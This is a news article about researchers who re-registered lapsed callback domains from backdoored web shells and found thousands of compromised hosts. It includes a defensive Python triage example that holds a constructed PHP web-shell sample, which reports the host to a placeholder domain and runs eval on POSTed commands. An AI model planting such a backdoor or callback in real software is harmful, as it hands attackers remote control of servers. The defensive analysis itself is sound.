Crims backdoored the backdoors they supplied to other miscreants. Then the domains lapsed
Here's what $20 gets you these days
More than 4,000 unique backdoors are using expired domains and/or abandoned infrastructure, and many of these expose government and academia-owned hosts – thus setting these hosts up for hijacking by criminals who likely have less altruistic intentions than the security researchers who uncovered the very same backdoors.
In its latest who-can-we-pwn expedition, the watchTowr Labs team set its sights on web shells. The end result is equal parts schadenfreude at witnessing attackers' security snafus and the discovery of real risks associated with abandoned domain names.
"The access here that we're demonstrating is effectively what we've affectionately termed mass-hacking-on-autopilot," watchTowr CEO Benjamin Harris told The Register.
"Imagine you want to gain access to thousands of systems, but don't feel like investing the effort to identify and compromise systems yourself – or getting your hands dirty," he continued.
"Instead, you commandeer abandoned backdoors in regularly used backdoors to effectively 'steal the spoils' of someone else's work, giving you the same access to a compromised system as the person who put the effort into identifying the mechanism to compromise, and performing the compromise of said system in the first place."
Once an attacker has that access, they can access all the data on the compromised host and/or use it to launch future attacks.
"Zero effort, same result – for the price of a domain," Harris said.
And, as was the case in an earlier watchTowr effort, the price tag on that abandoned criminal infrastructure was a mere $20 per domain.
This report, published Wednesday, follows the watchTowr crew's earlier research that also delved into abandoned and expired infrastructure. But in this case, the team examined how the "bad guys" throw away internet domains too.
Plus, they also highlight how attackers have historically backdoored the web shells they provide to other miscreants – thus giving the original author of the web shell access to everything that the current user touches.
These backdoored backdoors run the gamut from basic web shells to c99shell, r57shell, and China Chopper, just to name a few of the "all-bells-and-whistles" web shells that include functions "to allow hackers to hack hackers," according to Harris and co-author Aliz Hammond:
Adapting some internal code, we went on a mission – collect as many web shells as possible (regardless of language, target, or age), de-obfuscate any code that happened to be protected by the power of base64, and extract any unregistered domains likely used in some sort of callback function.
We then hooked that up to the AWS Route53 API, and just bought them en masse.
Honestly, it's $20, and we've done worse with more.
The researchers registered more than 40 domains (the report lists several of these web shells and their associated domains), spun up new infrastructure behind them, and then logged every incoming request before responding with a 404 error.
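The collection step described above (decode base64-protected strings, pull out the callback domains) is the same thing a defender does in reverse when triaging a web shell found on their own host: find where it phones home so the domain can be blocked and watched. The Python below is an added example, not watchTowr's tooling; the PHP fragment and the reserved `.invalid` domain are constructed.

```python
import base64
import binascii
import re

# Constructed sample, modelled on the "backdoored backdoor" pattern in the
# article: the shell hides its phone-home URL behind base64_decode(). The
# domain is a reserved .invalid placeholder, not a real indicator.
_CALLBACK = "http://callback-example.invalid/log.php?u="
SAMPLE_SHELL = (
    '<?php\n'
    '$k = "c2VjcmV0";\n'  # "secret": a short blob with no domain, to be ignored
    '$u = base64_decode("' + base64.b64encode(_CALLBACK.encode()).decode() + '");\n'
    '@file_get_contents($u . $_SERVER["HTTP_HOST"]);\n'
    'eval(base64_decode($_POST["cmd"]));\n'
)

BLOB_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")           # candidate base64 runs
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)  # host part of a URL
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)  # bare dotted names
FILE_EXTS = {"php", "js", "html", "htm", "txt", "asp", "aspx", "jsp", "css"}


def decode_printable_blobs(src: str) -> list[str]:
    """Return every base64 run in src that decodes to printable text."""
    out = []
    for m in BLOB_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or a binary payload: skip it
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            out.append(text)
    return out


def hostnames(text: str) -> set[str]:
    """Hostnames from URLs plus bare dotted names that are not file names."""
    found = {h.lower().rstrip(".") for h in URL_HOST_RE.findall(text)}
    for h in HOST_RE.findall(text):
        if h.rsplit(".", 1)[-1].lower() not in FILE_EXTS:
            found.add(h.lower())
    return found


def callback_domains(src: str) -> dict[str, list[str]]:
    """Candidate callback domains, split by whether they were base64-hidden."""
    plain = hostnames(src)
    hidden = set()
    for blob in decode_printable_blobs(src):
        hidden |= hostnames(blob)
    return {"plain": sorted(plain), "base64": sorted(hidden - plain)}
```

Every domain it reports is a candidate to check against your DNS and proxy logs; an expired or unregistered one is exactly the kind of lapsed infrastructure the article describes.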
The team logged "thousands" of requests, Harris said, adding that these were "primarily across a handful of the domains that we identified and re-registered."
After slogging through logs of incoming requests to watchTowr's newly accrued domains, the researchers found "multiple" compromised government-owned hosts from Bangladesh, China, Nigeria, and other countries, as well as higher-education entities across Thailand, China, and South Korea.
Among these high-value hosts, one belonging to the Federal High Court of Nigeria, for example, had four different web shells calling home from it, we're told. "So far we've found over 4,000 breached systems (three or four of which are breached .gov systems)," the duo wrote. "The number keeps going up – as you would expect."
As with watchTowr's earlier research, the team didn't want to let the 40-some web shell domains it registered lapse as their predecessors had.
"For the same reasons that both this research and the .MOBI research came to exist, we would be guilty of the exact same careless disposal of infrastructure if we were to let these domains expire as their previous owners did," Harris said.
To this end, the Shadowserver Foundation agreed to take ownership of the domains and sinkhole them.
Harris described the research as "morbid curiosity." The security shop's researchers would "watch the logs and find out what system we'd see compromised next," he told The Register.
It also held some nostalgia for the team: "As alluded to in the post, we're sure a lot of the cybersecurity industry is familiar with and likely grew up with a number of web shells that we discuss in our research," he added. "The reality, though, is that we consider this a 'peek behind the curtain' of activity that circles the internet every day, and can be incredibly interesting to watch play out in literal real time." ®